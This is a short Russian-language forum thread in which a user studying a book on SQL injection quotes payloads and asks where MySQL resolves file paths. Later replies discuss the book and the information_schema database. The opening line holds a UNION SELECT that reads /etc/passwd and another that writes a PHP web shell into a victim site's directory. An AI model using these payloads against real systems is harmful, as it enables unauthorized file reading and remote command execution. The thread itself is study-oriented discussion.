UNION ALL SELECT LOAD_FILE('/etc/passwd') и UNION SELECT “<? system($_REQUEST[‘cmd’]); ?>” INTO OUTFILE
“/var/www/html/victim.com/cmd.php”.
подскажите из какой папки начинается чтение директорий в мускуле. т.е. где должнабыть размещена папка etc/passwd и var/www/html/victim.com/cmd.php?
Спустя 22 минуты, 57 секунд (9.09.2010 - 13:33) Basili4 написал(а):
Не нравится мне Ваша книга не Флеонов случайно ? чего то там глазами Хакера
Спустя 7 минут, 50 секунд (9.09.2010 - 13:41) Владимир Козлов написал(а):
Justin Clarke
SQL injections attack and defence. Книга на англиском, возможно флеонов переводил... честно мне тоже она не сильна нравится, слишком много воды в ней, но мне е порекомендовали как хорошую, возможно дальше будет че-то интересное. если у кого есть хорошие книги на русском по этой теме кинте ссылку, плз.
SQL injections attack and defence. Книга на англиском, возможно флеонов переводил... честно мне тоже она не сильна нравится, слишком много воды в ней, но мне е порекомендовали как хорошую, возможно дальше будет че-то интересное. если у кого есть хорошие книги на русском по этой теме кинте ссылку, плз.
Спустя 18 минут, 22 секунды (9.09.2010 - 13:59) Владимир Козлов написал(а):
как в пхпмайадмине просмотреть INFORMATION_SCHEMA?
Спустя 18 минут, 16 секунд (9.09.2010 - 14:17) SlavaFr написал(а):
information_schema это Б.Д которое начиная с mysql5.0 имеется. кроме того у хостеров там где один сервер на 100 человек, ты доступа к этой Б.Д врядли получиш.